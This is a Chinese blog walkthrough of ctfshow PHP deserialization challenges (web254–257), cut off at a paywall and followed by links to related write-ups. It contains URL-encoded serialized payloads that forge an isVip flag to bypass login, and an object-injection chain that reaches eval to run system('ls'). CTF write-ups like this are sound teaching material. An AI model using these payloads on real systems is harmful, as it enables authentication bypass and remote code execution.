ctfshow——反序列化

已于 2024-03-02 17:06:19 修改
阅读量1.1k 收藏 9
点赞数 6
分类专栏: web渗透测试 文章标签: 网络安全
于 2024-02-26 23:52:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_55202378/article/details/136310233
版权
文章详细描述了一系列PHPweb应用中的安全漏洞,涉及反序列化攻击、对象注入、以及利用SoapClient类进行SSRF。攻击者通过精心构造的GET和POST参数,利用魔术方法和特定的序列化策略来执行恶意代码和访问敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

web 254——啥也没

在这里插入图片描述
在这里插入图片描述
这里就是使用GET传输,username赋值为xxxxxx,password也1赋值为xxxxxx

web 255——反序列化对变量进行赋值(1)

在这里插入图片描述
在这里插入图片描述
代码会对user变量进行反序列化,因此只需要GET传输的变量username和变量password的值与user变量反序列化得到的usernamepassword相等,且反序列化后的isVip等于True就行。
首先对类ctfShowUser进行序列化,PHP序列化和反序列化
在这里插入图片描述
user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D,注意需要对user的值进行URL编码。
在这里插入图片描述

web 256——反序列化对变量进行赋值(2)

在这里插入图片描述
在这里插入图片描述
以上一题相比,其实就是反序列化的类中的变量usernamepassword不要相等即可,注意GET传参时也要做修改。payload:

//url
?username=xxxxxx&password=123`

//POST cookie
user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A3%3A%22123%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

web 257——对象注入

在这里插入图片描述
在这里插入图片描述
思路:主要还是利用backDoor类中的eval函数unserialize反序列化后,会自动调用__construct()魔术方法,让__construct()魔术方法直接$this->class=new backdoor(),然后销毁类ctfShowUser时,就会自动调用 backdoor中的getInfo函数,同时我们可以在序列化的时候赋值code=$code='system("ls");',这样就能执行系统命令了。

得到序列化数据payLoad:

class ctfShowUser{
   
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
   
        $this->class=new backDoor();
    }
    public function login($u,$p){
   
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
   
        $this->class
最低0.47元/天 解锁文章
web安全渗透测试十大常规项(一):web渗透测试之PHP反序列化
HACKONE的博客
06-16 906
POP:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,序列化攻击都在PHP魔术方法中出现可利用的漏洞,因自动调用触发漏洞,但如关键代码没在魔术方法中,而是在一个类的普通方法中。漏洞危害:如存在__wakeup方法,调用unserilize()方法前则先调用__wakeup方法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup执行。__isset(): //在不可访问的属性上调用isset()或empty()触发。
CTFshow 反序列化 web254
Kradress的博客
12-19 352
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow-反序列化
m0_72898152的博客
02-17 1251
ctfshow反序列化
ctfshow之php反序列化
uuzfumo的博客
12-03 410
反序列化题目的题解
CTFshow——反序列化
D.MIND 的博客
02-28 1440
前言:  Bit师傅的:php反序列化详解  Y4师傅的:[CTF]PHP反序列化总结 文章目录web254——小热身web255——web256——web257——web258——加号绕过正则: `/[oc]:\d+:/i`web259——SoapClient与CRLF组合拳web260—— web254——小热身 直接?username=xxxxxx&password=xxxxxx即可,哈哈 web255—— <?php error_reporting(0); highlight_fil
CTFShow-反序列化
qq_66013948的博客
09-17 1372
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
ctfshow————反序列化
qq_45655564的博客
06-30 972
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6579
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
CTFshow 反序列化入门 web259
weixin_46099552的博客
09-05 334
CTFshow web259
ctfshow反序列化
cosmoslin的博客
11-15 2283
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
CTFshow-反序列化
qq_61376069的博客
01-29 629
CTFshow入门—反序列化。 加号绕过正则: /[oc]:\d+:/i;
ctfshow 反序列化
weixin_56537388的博客
09-05 735
对象是不能在字节流中传输的,序列化就是把对象转化为字符串以便存储和传输,反序列化就是将字符串转化为对象。
CTFSHOW反序列化
qq_45694932的博客
09-11 236
CTFSHOW web258 反序列化 正则匹配 class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public $class = 'info'; public function __construct(){ $this->class=new info(); } public functio
CTFSHOW 反序列化
ing_end的博客
04-09 2727
反序列化 为什么要序列化 class 类 实验室成员 obj 对象(是一种语言结构,一个对象就是一个变量)某一个成员 特征(成员变量) 性别,姓名。。。。。。 方法(动作) 思考,听课,下课。。。。。。 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定
CTFshow 反序列化
starttv的博客
12-09 876
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
Ctfshow 反序列化
qq_74806534的博客
03-17 1835
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入SSTI也是,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,
ctfshow pwntt
最新发布
02-17
针对CTFShow平台上名为pwntt的二进制漏洞利用(Pwn)类题目,通常涉及对程序中的缓冲区溢出、格式化字符串漏洞或其他内存破坏型错误进行攻击。这类题目旨在测试参赛者对于低级编程语言如C/C++的理解程度以及如何绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值